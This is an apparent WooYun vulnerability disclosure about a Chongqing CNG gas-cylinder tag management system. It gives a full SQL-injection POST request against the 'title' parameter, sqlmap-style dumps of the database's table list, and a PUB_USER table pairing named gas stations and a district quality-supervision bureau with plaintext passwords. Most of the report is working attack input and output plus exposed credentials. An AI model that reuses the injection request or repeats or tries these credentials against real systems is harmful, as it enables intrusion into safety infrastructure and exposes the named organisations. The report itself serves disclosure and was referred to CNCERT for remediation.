乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-29: 细节已通知厂商并且等待厂商处理中 2016-01-05: 厂商已经确认,细节仅向厂商公开 2016-01-15: 细节向核心白帽子及相关领域专家公开 2016-01-25: 细节向普通白帽子公开 2016-02-04: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
影响大大的!!!
重庆市CNG气瓶电子标签安全管理系统
**.**.**.**:5000
多出存在SQL post方式注入
给出一个数据包,title参数存在注入
POST /site/jsp/info_index.jsp?type=s HTTP/1.1Host: **.**.**.**:5000Content-Length: 9Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: **.**.**.**:5000User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 LBBROWSERContent-Type: application/x-www-form-urlencodedReferer: **.**.**.**:5000/site/jsp/info_detail.jsp?id=125985206898403Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=7A365B0EFA7B86086F110789111EE95Ftitle=%27*
available databases [16]:[*] CQCNG[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
数据主要集中在CQCNG中,不多赘述,看数据
Database: CQCNG+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| FL_REFUELINGSTATIONS | 202433124 |加气站信息| FL_PUSHSOCKET5002 | 69198121 |推送信息的| FL_REFUELINGSTATIONS2013 | 58300896 || FL_PUSHRECORD2013 | 34728357 || FL_PUSHRECORD2014 | 33048403 || FL_PUSHRECORD2012 | 28624450 || FL_PUSHSOCKET5008 | 26431646 || FL_PUSHSOCKET5007 | 15833440 || FL_PUSHRECORD | 11335222 |推送记录| FL_PUSHSOCKET | 10548898 || PUB_SOCKET_LOG | 9721219 || FL_PUSHRECORD2011 | 9388511 || FL_PUSHRECORD_DELLOG | 3914654 || FL_PUSHPACKAGELOG | 1687948 || FL_PUSHSOCKET5009 | 1216605 || FL_PUSHMACHINEOPERLOG2013 | 1023746 || FL_PUSHMACHINEOPERLOG | 542563 |推送机器操作记录| TAGSENDLOG | 339657 |标签发送记录| TAGSEND | 268365 || PUB_DATE_LOG | 267982 || CK_TREMLY_INFO | 230015 || CK_FIXED_INFO | 204399 || RE_CYLINDERINFO | 202811 || RE_EDITCARINFO_LOG | 200448 || PUB_LOG | 149902 || RE_CYLINDERINFO_CHANGEREG | 139523 || RE_CARINFO | 132464 || WT_USE_REGISTRATION | 119185 || RE_CARINFO_CHANGEREG | 92837 || RE_CARINFO_LOG | 92678 || EIDTCARINFO | 76830 || TEXT | 58753 || FL_PUSHRECORD_TEMP | 39902 || WT_USE_REGISTRATION_LOG | 22666 || WT_BLACK_REG | 19446 || WT_AGAINCK_LOG | 9250 || SYS_CYLINDERINFO_LOG | 7752 || PUB_USER_PERMISSION | 7520 || RE_CYLINDERINFO_RELOAD | 6868 || RE_CYLINDERINFO_TEMP | 6688 || EDITCARINFO2 | 5708 || RE_CARINFO_RELOAD | 5662 || FL_OPERATORINFO_LOG | 5522 || SYS_PAGECOL | 3680 || RE_CARINFO_TEMP | 3348 || TAGSEND_OLD | 2990 || RE_CARAGAINCHECKINFO | 2917 || FL_OPERATORINFO | 2573 || WT_ORGANIZATION | 2162 || TAGSENDOLD | 1336 || RE_CYLINDERINFO_SCRAPPED | 1124 || PUB_CODE_SYS_VALUES | 1032 || WT_BLACK_NOTES | 965 || RE_TUNINGCYLINDERINFO | 948 || RE_CARINFO_SCRAPPED | 929 || FL_PUSHMACHINEPAR | 788 || RE_CARCHECKINFO | 637 || RE_INSTALLFULFILL | 637 || FL_PUSHMACHINEINFO | 632 || PUB_CREATE_CODE | 604 || RE_TUNINGCARINFO | 560 || TAGSENDOLD1 | 375 || PUB_ROLE_PERMISSION | 270 || PUB_USER | 265 |管理人员| PUB_BLOB | 221 || FL_SPECIALTYPE | 203 || QM_TESTTABLE | 199 || PUB_PERMISSION | 192 || WT_PERMISSIONS | 191 || SYS_PAGE | 165 || TX_UPDATESTATUS | 145 || SYS_PAGEPERSONALITY | 140 || FL_PUSHRECORD_WS_ERR | 131 || CK_BUILD_VERDICT | 108 || WT_ORG_DEFREG | 106 || PUB_UNIT | 98 || RE_REDOOPERATORINFO | 79 || WT_CYLINDER_SCRAP | 74 || WT_ADMINISTRATIVE_DIVISIONS | 46 || PUB_CODE_SYS_INDEX | 43 || WT_CQXZQH | 43 || WT_INFO | 43 || MK_CYLINDERINFO | 40 || WT_BLACK_LOG | 40 || PUB_USER_ROLE | 37 || WT_OPERATORINFO | 36 || WT_TAGSENDUP | 24 || WT_WATCHMES_LOG | 14 || MW_CYLINDERINFO | 9 || MW_WHOLECAR | 9 || PUB_FILES | 7 || YF | 7 || PUB_SYSTEM_ROLE | 6 || WT_BLACK_LIST | 6 || WT_PATROL | 6 || WT_PLOTRULE | 6 || QRTZ_CRON_TRIGGERS | 4 || QRTZ_JOB_DETAILS | 4 || QRTZ_TRIGGERS | 4 || CK_RE_PURVIEW | 3 || MK_SELLINFO | 3 || PUB_SYSTEM_PARA | 2 || TEST_APP_USER | 2 || RE_CARINFO_GZGJ | 1 || WT_BUSINESS_PARAMETERS | 1 || WT_ORGANIZATION_TEMP | 1 |+-----------------------------+---------+
部分管理机构的账号密码,发现虽然使用汉字作为登录名,但是弱口令严重
Table: PUB_USER[10 entries]+---------------+-----------+----------+| NAME | LOGINNAME | PASSWORD |+---------------+-----------+----------+| 花园新村加气站 | 花园新村加气站 | lkjhgfd || 海星修理厂 | 海星修理厂 | 123456 || 天成加气站 | 天成加气站 | 123456 || 重庆市博特气瓶检验有限公司 | 博特科技 | 123456 || 凯源两路 | 凯源两路 | 123456 || 渝北佳顺 | 渝北佳顺 | 123456 || 重庆市银泰天然气有限公司 | 长寿银泰 | asdfgh || 殷莲 | 大足万隆 | 43780758 || 重庆市永川区质监局 | 永川区质监局 | 87163104 || 荣昌渝昌加气站 | 荣昌渝昌 | 123456 |+---------------+-----------+----------+
登陆部分账号
另外在未登录处即可查询车辆信息
这个系统最好找专人拯救一下吧
危害等级:高
漏洞Rank:10
确认时间:2016-01-05 11:15
CNVD确认并复现所述情况,已经转由CNCERT下发给重庆分中心,由其后续协调网站管理单位处置.
暂无